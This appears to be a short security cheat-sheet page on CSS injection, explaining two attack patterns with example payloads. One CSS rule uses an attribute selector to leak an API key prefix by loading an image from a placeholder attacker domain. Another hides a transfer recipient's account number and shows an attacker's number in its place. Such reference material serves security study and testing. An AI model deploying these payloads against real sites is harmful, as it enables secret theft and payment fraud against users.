Skip to content

CSS_Injection.md

Latest commit

 

History

History
42 lines (33 loc) · 930 Bytes

CSS_Injection.md

File metadata and controls

42 lines (33 loc) · 930 Bytes

CSS Injection

Table of Contents

Data Exfiltration

Sensitive data on the page can be exfiltrated.

  • API key stealing 
    input[name='api_key'][value^='secret_value_'] {
    background-image: url('https://[ATTACKER-DOMAIN]/?leak=secret_value_');
}

UI Redressing (Phishing)

The user interface can be visually altered to mislead users or steal their credentials.

  • Phishing

    ...
<div class="transfer-details">
    <p>Recipient Account Number:</p>
    <span id="account-number">123-456-7890</span>
</div>
...
    /* CSS injected by an attacker */
#account-number {
    font-size: 0;
}

#account-number::after {
    content: "098-765-4321"; /* Attacker's account number */
    font-size: 1rem;
}